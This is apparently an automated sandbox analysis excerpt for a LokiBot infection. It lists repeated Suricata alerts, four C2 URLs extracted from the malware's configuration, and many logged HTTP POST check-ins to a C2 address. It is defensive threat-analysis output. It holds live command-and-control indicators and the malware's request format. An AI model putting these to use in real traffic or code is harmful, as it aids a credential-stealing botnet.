Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49940 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49940 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49940 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49940 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49940 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50036 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50026 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50026 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50026 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50026 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50026 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50076 -> 94.156.177.41:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 145Connection: close
